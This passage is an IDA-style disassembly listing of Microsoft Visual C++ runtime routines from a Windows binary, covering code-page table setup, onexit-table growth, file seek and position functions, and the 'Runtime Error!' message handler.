loc_41ABA6: ; CODE XREF: sub_41AA66+2D�j
xor eax, eax
loc_41ABA8: ; CODE XREF: sub_41AA66+182�j
cmp eax, 41h
jb short loc_41ABC6
cmp eax, 5Ah
ja short loc_41ABC6
or byte_47C761[eax], 10h
mov cl, al
add cl, 20h
loc_41ABBE: ; CODE XREF: sub_41AA66+176�j
mov byte_47C880[eax], cl
jmp short loc_41ABE5
; ---------------------------------------------------------------------------
loc_41ABC6: ; CODE XREF: sub_41AA66+145�j
; sub_41AA66+14A�j
cmp eax, 61h
jb short loc_41ABDE
cmp eax, 7Ah
ja short loc_41ABDE
or byte_47C761[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41ABBE
; ---------------------------------------------------------------------------
loc_41ABDE: ; CODE XREF: sub_41AA66+163�j
; sub_41AA66+168�j
and byte_47C880[eax], 0
loc_41ABE5: ; CODE XREF: sub_41AA66+15E�j
inc eax
cmp eax, esi
jb short loc_41ABA8
loc_41ABEA: ; CODE XREF: sub_41AA66+13E�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
call sub_41A026
leave
retn
sub_41AA66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ABF8 proc near ; CODE XREF: sub_41AF6B+1A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_429540
call __SEH_prolog
push 0Dh
call sub_4180B5
pop ecx
and [ebp+ms_exc.disabled], 0
call sub_416C45
mov edi, eax
mov [ebp+var_1C], edi
mov esi, [edi+60h]
mov [ebp+var_20], esi
cmp esi, dword_47C744
jz short loc_41AC4A
test esi, esi
jz short loc_41AC37
dec dword ptr [esi]
jnz short loc_41AC37
push esi
call sub_414844
pop ecx
loc_41AC37: ; CODE XREF: sub_41ABF8+32�j
; sub_41ABF8+36�j
mov eax, dword_47C744
mov [edi+60h], eax
mov esi, dword_47C744
mov [ebp+var_20], esi
inc dword ptr [esi]
loc_41AC4A: ; CODE XREF: sub_41ABF8+2E�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41AC5E
mov eax, esi
call __SEH_epilog
retn
sub_41ABF8 endp
; =============== S U B R O U T I N E =======================================
sub_41AC5B proc near ; DATA XREF: .rdata:stru_429540�o
mov esi, [ebp-20h]
sub_41AC5B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41AC5E proc near ; CODE XREF: sub_41ABF8+56�p
push 0Dh
call sub_418021
pop ecx
retn
sub_41AC5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AC67 proc near ; CODE XREF: sub_41ADFD+9F�p
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, dword_42DEB8
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
mov [ebp+var_4], eax
push edi
jz loc_41ADDC
xor edx, edx
xor eax, eax
loc_41AC8C: ; CODE XREF: sub_41AC67+36�j
cmp dword_42DED8[eax], esi
jz short loc_41ACF9
add eax, 30h
inc edx
cmp eax, 0F0h
jb short loc_41AC8C
lea eax, [ebp+var_1C]
push eax
push esi
call ds:dword_4201B0 ; GetCPInfo
cmp eax, 1
jnz loc_41ADD4
push 40h
xor eax, eax
cmp [ebp+var_1C], 1
pop ecx
mov edi, offset byte_47C760
rep stosd
stosb
mov dword_47C864, esi
mov dword_47C740, ebx
jbe loc_41ADC2
cmp [ebp+var_16], 0
jz loc_41AD9A
lea ecx, [ebp+var_15]
loc_41ACE3: ; CODE XREF: sub_41AC67+12D�j
mov dl, [ecx]
test dl, dl
jz loc_41AD9A
movzx eax, byte ptr [ecx-1]
movzx edx, dl
jmp loc_41AD8A
; ---------------------------------------------------------------------------
loc_41ACF9: ; CODE XREF: sub_41AC67+2B�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_47C760
rep stosd
lea ecx, [edx+edx*2]
shl ecx, 4
mov [ebp+var_8], ebx
stosb
lea ebx, dword_42DEE8[ecx]
loc_41AD15: ; CODE XREF: sub_41AC67+EB�j
mov al, [ebx]
mov esi, ebx
jmp short loc_41AD44
; ---------------------------------------------------------------------------
loc_41AD1B: ; CODE XREF: sub_41AC67+DF�j
mov dl, [esi+1]
test dl, dl
jz short loc_41AD48
movzx eax, al
movzx edi, dl
cmp eax, edi
ja short loc_41AD40
mov edx, [ebp+var_8]
mov dl, byte_42DED0[edx]
loc_41AD35: ; CODE XREF: sub_41AC67+D7�j
or byte_47C761[eax], dl
inc eax
cmp eax, edi
jbe short loc_41AD35
loc_41AD40: ; CODE XREF: sub_41AC67+C3�j
inc esi
inc esi
mov al, [esi]
loc_41AD44: ; CODE XREF: sub_41AC67+B2�j
test al, al
jnz short loc_41AD1B
loc_41AD48: ; CODE XREF: sub_41AC67+B9�j
inc [ebp+var_8]
add ebx, 8
cmp [ebp+var_8], 4
jb short loc_41AD15
mov eax, [ebp+arg_0]
mov dword_47C864, eax
mov dword_47C748, 1
call sub_41AA0E
lea ecx, dword_42DEDC[ecx]
mov esi, ecx
mov edi, offset word_47C870
movsd
movsd
mov dword_47C740, eax
movsd
jmp short loc_41ADE1
; ---------------------------------------------------------------------------
loc_41AD82: ; CODE XREF: sub_41AC67+125�j
or byte_47C761[eax], 4
inc eax
loc_41AD8A: ; CODE XREF: sub_41AC67+8D�j
cmp eax, edx
jbe short loc_41AD82
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41ACE3
loc_41AD9A: ; CODE XREF: sub_41AC67+73�j
; sub_41AC67+80�j
xor ecx, ecx
inc ecx
mov eax, ecx
loc_41AD9F: ; CODE XREF: sub_41AC67+145�j
or byte_47C761[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_41AD9F
mov eax, esi
call sub_41AA0E
mov dword_47C740, eax
mov dword_47C748, ecx
jmp short loc_41ADC8
; ---------------------------------------------------------------------------
loc_41ADC2: ; CODE XREF: sub_41AC67+69�j
mov dword_47C748, ebx
loc_41ADC8: ; CODE XREF: sub_41AC67+159�j
xor eax, eax
mov edi, offset word_47C870
stosd
stosd
stosd
jmp short loc_41ADE1
; ---------------------------------------------------------------------------
loc_41ADD4: ; CODE XREF: sub_41AC67+46�j
cmp dword_47C38C, ebx
jz short loc_41ADEA
loc_41ADDC: ; CODE XREF: sub_41AC67+1B�j
call sub_41AA3D
loc_41ADE1: ; CODE XREF: sub_41AC67+119�j
; sub_41AC67+16B�j
call sub_41AA66
xor eax, eax
jmp short loc_41ADED
; ---------------------------------------------------------------------------
loc_41ADEA: ; CODE XREF: sub_41AC67+173�j
or eax, 0FFFFFFFFh
loc_41ADED: ; CODE XREF: sub_41AC67+181�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41A026
leave
retn
sub_41AC67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ADFD proc near ; CODE XREF: sub_41AF4D+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 14h
push offset stru_429550
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
push 0Dh
call sub_4180B5
pop ecx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
mov dword_47C38C, edi
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_41AE3A
mov dword_47C38C, 1
call ds:dword_4201AC ; GetOEMCP
jmp short loc_41AE65
; ---------------------------------------------------------------------------
loc_41AE3A: ; CODE XREF: sub_41ADFD+29�j
cmp eax, 0FFFFFFFDh
jnz short loc_41AE51
mov dword_47C38C, 1
call ds:dword_4201A8 ; GetACP
jmp short loc_41AE65
; ---------------------------------------------------------------------------
loc_41AE51: ; CODE XREF: sub_41ADFD+40�j
cmp eax, 0FFFFFFFCh
jnz short loc_41AE65
mov dword_47C38C, 1
mov eax, dword_47C4F0
loc_41AE65: ; CODE XREF: sub_41ADFD+3B�j
; sub_41ADFD+52�j ...
mov [ebp+arg_0], eax
cmp eax, dword_47C864
jz loc_41AF2F
mov esi, dword_47C744
mov [ebp+var_20], esi
cmp esi, edi
jz short loc_41AE85
cmp [esi], edi
jz short loc_41AE95
loc_41AE85: ; CODE XREF: sub_41ADFD+82�j
push 220h
call sub_414CAD
pop ecx
mov esi, eax
mov [ebp+var_20], esi
loc_41AE95: ; CODE XREF: sub_41ADFD+86�j
cmp esi, edi
jz short loc_41AF18
push [ebp+arg_0]
call sub_41AC67
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jnz short loc_41AF18
mov [esi], edi
mov eax, dword_47C864
mov [esi+4], eax
mov eax, dword_47C748
mov [esi+8], eax
mov eax, dword_47C740
mov [esi+0Ch], eax
xor eax, eax
loc_41AEC5: ; CODE XREF: sub_41ADFD+DE�j
mov [ebp+var_24], eax
cmp eax, 5
jge short loc_41AEDD
mov cx, word_47C870[eax*2]
mov [esi+eax*2+10h], cx
inc eax
jmp short loc_41AEC5
; ---------------------------------------------------------------------------
loc_41AEDD: ; CODE XREF: sub_41ADFD+CE�j
xor eax, eax
loc_41AEDF: ; CODE XREF: sub_41ADFD+F7�j
mov [ebp+var_24], eax
cmp eax, 101h
jge short loc_41AEF6
mov cl, byte_47C760[eax]
mov [eax+esi+1Ch], cl
inc eax
jmp short loc_41AEDF
; ---------------------------------------------------------------------------
loc_41AEF6: ; CODE XREF: sub_41ADFD+EA�j
xor eax, eax
loc_41AEF8: ; CODE XREF: sub_41ADFD+113�j
mov [ebp+var_24], eax
cmp eax, 100h
jge short loc_41AF12
mov cl, byte_47C880[eax]
mov [eax+esi+11Dh], cl
inc eax
jmp short loc_41AEF8
; ---------------------------------------------------------------------------
loc_41AF12: ; CODE XREF: sub_41ADFD+103�j
mov dword_47C744, esi
loc_41AF18: ; CODE XREF: sub_41ADFD+9A�j
; sub_41ADFD+AA�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_41AF32
cmp esi, dword_47C744
jz short loc_41AF32
push esi
call sub_414844
pop ecx
jmp short loc_41AF32
; ---------------------------------------------------------------------------
loc_41AF2F: ; CODE XREF: sub_41ADFD+71�j
mov [ebp+var_1C], edi
loc_41AF32: ; CODE XREF: sub_41ADFD+11F�j
; sub_41ADFD+127�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41AF44
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41ADFD endp
; =============== S U B R O U T I N E =======================================
sub_41AF44 proc near ; CODE XREF: sub_41ADFD+139�p
; DATA XREF: .rdata:stru_429550�o
push 0Dh
call sub_418021
pop ecx
retn
sub_41AF44 endp
; =============== S U B R O U T I N E =======================================
sub_41AF4D proc near ; CODE XREF: sub_41B70D+9�p
; sub_41B776+D�p ...
cmp dword_47D9D4, 0
jnz short loc_41AF68
push 0FFFFFFFDh
call sub_41ADFD
pop ecx
mov dword_47D9D4, 1
loc_41AF68: ; CODE XREF: sub_41AF4D+7�j
xor eax, eax
retn
sub_41AF4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AF6B proc near ; CODE XREF: sub_415B3D+2C�p
; sub_415B3D+A7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
call sub_416C45
mov eax, [eax+60h]
cmp eax, dword_47C744
jz short loc_41AF8A
call sub_41ABF8
loc_41AF8A: ; CODE XREF: sub_41AF6B+18�j
cmp dword ptr [eax+8], 0
jnz short loc_41AFA1
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_4144A0
add esp, 0Ch
jmp short loc_41AFE9
; ---------------------------------------------------------------------------
loc_41AFA1: ; CODE XREF: sub_41AF6B+23�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_41AFE6
push ebx
push esi
mov esi, [ebp+arg_4]
loc_41AFAD: ; CODE XREF: sub_41AF6B+89�j
mov dl, [esi]
movzx ebx, dl
dec ecx
test byte ptr [ebx+eax+1Dh], 4
mov [edi], dl
jz short loc_41AFEC
inc edi
inc esi
test ecx, ecx
jz short loc_41AFF8
mov dl, [esi]
dec ecx
mov [edi], dl
inc edi
inc esi
test dl, dl
jnz short loc_41AFF2
and [edi-2], dl
loc_41AFD0: ; CODE XREF: sub_41AF6B+85�j
test ecx, ecx
jz short loc_41AFE4
mov edx, ecx
shr ecx, 2
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_41AFE4: ; CODE XREF: sub_41AF6B+67�j
; sub_41AF6B+8B�j ...
pop esi
pop ebx
loc_41AFE6: ; CODE XREF: sub_41AF6B+3B�j
mov eax, [ebp+arg_0]
loc_41AFE9: ; CODE XREF: sub_41AF6B+34�j
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41AFEC: ; CODE XREF: sub_41AF6B+4F�j
inc edi
inc esi
test dl, dl
jz short loc_41AFD0
loc_41AFF2: ; CODE XREF: sub_41AF6B+60�j
test ecx, ecx
jnz short loc_41AFAD
jmp short loc_41AFE4
; ---------------------------------------------------------------------------
loc_41AFF8: ; CODE XREF: sub_41AF6B+55�j
and byte ptr [edi-1], 0
jmp short loc_41AFE4
sub_41AF6B endp
; =============== S U B R O U T I N E =======================================
sub_41AFFE proc near ; CODE XREF: sub_41B0A6+18�p
push esi
push dword_47D9D0
call sub_41E20D
pop ecx
mov ecx, dword_47D9CC
mov esi, eax
mov eax, dword_47D9D0
mov edx, ecx
sub edx, eax
add edx, 4
cmp esi, edx
jnb short loc_41B071
mov ecx, 800h
cmp esi, ecx
jnb short loc_41B02E
mov ecx, esi
loc_41B02E: ; CODE XREF: sub_41AFFE+2C�j
add ecx, esi
push ecx
push eax
call sub_4149EA
test eax, eax
pop ecx
pop ecx
jnz short loc_41B054
add esi, 10h
push esi
push dword_47D9D0
call sub_4149EA
test eax, eax
pop ecx
pop ecx
jnz short loc_41B054
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B054: ; CODE XREF: sub_41AFFE+3D�j
; sub_41AFFE+52�j
mov ecx, dword_47D9CC
sub ecx, dword_47D9D0
mov dword_47D9D0, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_47D9CC, ecx
loc_41B071: ; CODE XREF: sub_41AFFE+23�j
mov [ecx], edi
add dword_47D9CC, 4
mov eax, edi
pop esi
retn
sub_41AFFE endp
; =============== S U B R O U T I N E =======================================
sub_41B07E proc near ; DATA XREF: .data:0042B018�o
push 80h
call sub_414CAD
test eax, eax
pop ecx
mov dword_47D9D0, eax
jnz short loc_41B096
push 18h
pop eax
retn
; ---------------------------------------------------------------------------
loc_41B096: ; CODE XREF: sub_41B07E+12�j
and dword ptr [eax], 0
mov eax, dword_47D9D0
mov dword_47D9CC, eax
xor eax, eax
retn
sub_41B07E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0A6 proc near ; CODE XREF: sub_41B0DE+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_429560
call __SEH_prolog
call loc_415D79
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_0]
call sub_41AFFE
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B0D8
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41B0A6 endp
; =============== S U B R O U T I N E =======================================
sub_41B0D8 proc near ; CODE XREF: sub_41B0A6+24�p
; DATA XREF: .rdata:stru_429560�o
call sub_415D82
retn
sub_41B0D8 endp
; =============== S U B R O U T I N E =======================================
sub_41B0DE proc near ; CODE XREF: sub_415D8B+3B�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41B0A6
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_41B0DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B0F0 proc near ; CODE XREF: .text:loc_416205�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_429570
call __SEH_prolog
mov [ebp+var_1C], offset dword_429D84
loc_41B103: ; CODE XREF: sub_41B0F0+3C�j
cmp [ebp+var_1C], offset dword_429D84
jnb short loc_41B12E
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_41B124
call eax
jmp short loc_41B124
; ---------------------------------------------------------------------------
loc_41B11D: ; DATA XREF: .rdata:stru_429570�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41B121: ; DATA XREF: .rdata:stru_429570�o
mov esp, [ebp+ms_exc.old_esp]
loc_41B124: ; CODE XREF: sub_41B0F0+27�j
; sub_41B0F0+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_41B103
; ---------------------------------------------------------------------------
loc_41B12E: ; CODE XREF: sub_41B0F0+1A�j
call __SEH_epilog
retn
sub_41B0F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B134 proc near ; DATA XREF: sub_415D8B:loc_415DC1�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_429580
call __SEH_prolog
mov [ebp+var_1C], offset dword_429D8C
loc_41B147: ; CODE XREF: sub_41B134+3C�j
cmp [ebp+var_1C], offset dword_429D8C
jnb short loc_41B172
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_41B168
call eax
jmp short loc_41B168
; ---------------------------------------------------------------------------
loc_41B161: ; DATA XREF: .rdata:stru_429580�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41B165: ; DATA XREF: .rdata:stru_429580�o
mov esp, [ebp+ms_exc.old_esp]
loc_41B168: ; CODE XREF: sub_41B134+27�j
; sub_41B134+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_41B147
; ---------------------------------------------------------------------------
loc_41B172: ; CODE XREF: sub_41B134+1A�j
call __SEH_epilog
retn
sub_41B134 endp
; =============== S U B R O U T I N E =======================================
sub_41B178 proc near ; CODE XREF: sub_418CEA+18B�p
; sub_41B1EC+52�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_41CB4B
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41B199
call sub_419430
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B199: ; CODE XREF: sub_41B178+F�j
push edi
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call ds:dword_420090 ; SetFilePointer
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41B1BA
call ds:dword_420008 ; RtlGetLastWin32Error
jmp short loc_41B1BC
; ---------------------------------------------------------------------------
loc_41B1BA: ; CODE XREF: sub_41B178+38�j
xor eax, eax
loc_41B1BC: ; CODE XREF: sub_41B178+40�j
test eax, eax
jz short loc_41B1CC
push eax
call sub_419442
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_41B1E9
; ---------------------------------------------------------------------------
loc_41B1CC: ; CODE XREF: sub_41B178+46�j
mov ecx, esi
and esi, 1Fh
sar ecx, 5
mov ecx, dword_47C640[ecx*4]
mov eax, esi
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+4]
and byte ptr [eax], 0FDh
mov eax, edi
loc_41B1E9: ; CODE XREF: sub_41B178+52�j
pop edi
pop esi
retn
sub_41B178 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B1EC proc near ; CODE XREF: sub_415FF8+69�p
; sub_4162EB+D0�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041B27B SIZE 0000001C BYTES
push 0Ch
push offset stru_429590
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47C638
jnb short loc_41B27B
mov eax, ebx
sar eax, 5
lea edi, ds:47C640h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41B27B
push ebx
call sub_41CB8C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41B24B
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_41B178
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_41B262
; ---------------------------------------------------------------------------
loc_41B24B: ; CODE XREF: sub_41B1EC+49�j
call sub_419430
mov dword ptr [eax], 9
call sub_419439
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_41B262: ; CODE XREF: sub_41B1EC+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41B273
mov eax, [ebp+var_1C]
jmp short loc_41B291
sub_41B1EC endp
; =============== S U B R O U T I N E =======================================
sub_41B270 proc near ; DATA XREF: .rdata:stru_429590�o
mov ebx, [ebp+8]
sub_41B270 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B273 proc near ; CODE XREF: sub_41B1EC+7A�p
push ebx
call sub_41CBFF
pop ecx
retn
sub_41B273 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41B1EC
loc_41B27B: ; CODE XREF: sub_41B1EC+15�j
; sub_41B1EC+35�j
call sub_419430
mov dword ptr [eax], 9
call sub_419439
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41B291: ; CODE XREF: sub_41B1EC+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41B1EC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B297 proc near ; CODE XREF: sub_415FF8+2B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+10h]
xor ebx, ebx
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_41B2B3
mov [edi+4], ebx
loc_41B2B3: ; CODE XREF: sub_41B297+17�j
push 1
push ebx
push esi
call sub_41B1EC
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_41B334
mov ecx, [edi+0Ch]
test cx, 108h
jnz short loc_41B2D8
sub eax, [edi+4]
jmp loc_41B3F4
; ---------------------------------------------------------------------------
loc_41B2D8: ; CODE XREF: sub_41B297+37�j
mov eax, [edi]
mov edx, [edi+8]
mov ebx, eax
sub ebx, edx
test cl, 3
mov [ebp+var_8], ebx
jz short loc_41B325
mov ebx, esi
mov ecx, esi
sar ebx, 5
mov ebx, dword_47C640[ebx*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
test byte ptr [ebx+ecx*4+4], 80h
jz short loc_41B317
mov ecx, edx
cmp ecx, eax
jnb short loc_41B317
loc_41B30A: ; CODE XREF: sub_41B297+7E�j
cmp byte ptr [ecx], 0Ah
jnz short loc_41B312
inc [ebp+var_8]
loc_41B312: ; CODE XREF: sub_41B297+76�j
inc ecx
cmp ecx, [edi]
jb short loc_41B30A
loc_41B317: ; CODE XREF: sub_41B297+6B�j
; sub_41B297+71�j ...
cmp [ebp+var_4], 0
jnz short loc_41B33C
mov eax, [ebp+var_8]
jmp loc_41B3F4
; ---------------------------------------------------------------------------
loc_41B325: ; CODE XREF: sub_41B297+50�j
test cl, cl
js short loc_41B317
call sub_419430
mov dword ptr [eax], 16h
loc_41B334: ; CODE XREF: sub_41B297+2D�j
or eax, 0FFFFFFFFh
jmp loc_41B3F4
; ---------------------------------------------------------------------------
loc_41B33C: ; CODE XREF: sub_41B297+84�j
test byte ptr [edi+0Ch], 1
jz loc_41B3EC
mov ecx, [edi+4]
test ecx, ecx
jnz short loc_41B355
and [ebp+var_8], ecx
jmp loc_41B3EC
; ---------------------------------------------------------------------------
loc_41B355: ; CODE XREF: sub_41B297+B4�j
sub eax, edx
add eax, ecx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
lea ebx, ds:47C640h[eax*4]
mov eax, esi
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [esi+eax+4], 80h
jz short loc_41B3E6
push 2
push 0
push [ebp+var_C]
call sub_41B1EC
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_41B3AD
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
jmp short loc_41B3A3
; ---------------------------------------------------------------------------
loc_41B39A: ; CODE XREF: sub_41B297+10E�j
cmp byte ptr [eax], 0Ah
jnz short loc_41B3A2
inc [ebp+arg_0]
loc_41B3A2: ; CODE XREF: sub_41B297+106�j
inc eax
loc_41B3A3: ; CODE XREF: sub_41B297+101�j
cmp eax, ecx
jb short loc_41B39A
test byte ptr [edi+0Dh], 20h
jmp short loc_41B3E1
; ---------------------------------------------------------------------------
loc_41B3AD: ; CODE XREF: sub_41B297+F7�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_41B1EC
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41B3D4
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41B3D4
test ch, 4
jz short loc_41B3D7
loc_41B3D4: ; CODE XREF: sub_41B297+12E�j
; sub_41B297+136�j
mov eax, [edi+18h]
loc_41B3D7: ; CODE XREF: sub_41B297+13B�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_41B3E1: ; CODE XREF: sub_41B297+114�j
jz short loc_41B3E6
inc [ebp+arg_0]
loc_41B3E6: ; CODE XREF: sub_41B297+E3�j
; sub_41B297:loc_41B3E1�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_41B3EC: ; CODE XREF: sub_41B297+A9�j
; sub_41B297+B9�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41B3F4: ; CODE XREF: sub_41B297+3C�j
; sub_41B297+89�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41B297 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3F9 proc near ; CODE XREF: sub_4160D0+12�p
; sub_4160F5+12�p ...
var_10C = byte ptr -10Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, dword_42DEB8
xor eax, [ebp+4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov [ebp+var_4], eax
xor edx, edx
push edi
xor eax, eax
loc_41B417: ; CODE XREF: sub_41B3F9+2B�j
cmp ecx, dword_42DFC8[eax*8]
jz short loc_41B426
inc eax
cmp eax, 12h
jb short loc_41B417
loc_41B426: ; CODE XREF: sub_41B3F9+25�j
mov esi, eax
shl esi, 3
cmp ecx, dword_42DFC8[esi]
jnz loc_41B55A
mov eax, dword_47C210
cmp eax, 1
jz loc_41B535
cmp eax, edx
jnz short loc_41B456
cmp dword_42D7D4, 1
jz loc_41B535
loc_41B456: ; CODE XREF: sub_41B3F9+4E�j
cmp ecx, 0FCh
jz loc_41B55A
push 104h
lea eax, [ebp+var_10C]
push eax
push edx
mov [ebp+var_8], dl
call ds:dword_420010 ; GetModuleFileNameA
test eax, eax
jnz short loc_41B48F
lea eax, [ebp+var_10C]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_419A70
pop ecx
pop ecx
loc_41B48F: ; CODE XREF: sub_41B3F9+81�j
lea eax, [ebp+var_10C]
push eax
lea edi, [ebp+var_10C]
call sub_4177F0
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_41B4D1
lea eax, [ebp+var_10C]
push eax
call sub_4177F0
mov edi, eax
lea eax, [ebp+var_10C]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_4144A0
add esp, 10h
loc_41B4D1: ; CODE XREF: sub_41B3F9+AD�j
push edi
call sub_4177F0
push off_42DFCC[esi]
mov ebx, eax
call sub_4177F0
lea eax, [ebx+eax+1Ch]
pop ecx
add eax, 3
pop ecx
and eax, 0FFFFFFFCh
call sub_414630
mov ebx, esp
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push ebx
call sub_419A70
push edi
push ebx
call sub_419A80
push offset asc_4298C0 ; "\n\n"
push ebx
call sub_419A80
push off_42DFCC[esi]
push ebx
call sub_419A80
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebx
call sub_41E283
add esp, 2Ch
jmp short loc_41B55A
; ---------------------------------------------------------------------------
loc_41B535: ; CODE XREF: sub_41B3F9+46�j
; sub_41B3F9+57�j
push edx
lea eax, [ebp+arg_0]
push eax
lea esi, off_42DFCC[esi]
push dword ptr [esi]
call sub_4177F0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_4201B4 ; GetStdHandle
push eax
call ds:dword_420040 ; WriteFile
loc_41B55A: ; CODE XREF: sub_41B3F9+38�j
; sub_41B3F9+63�j ...
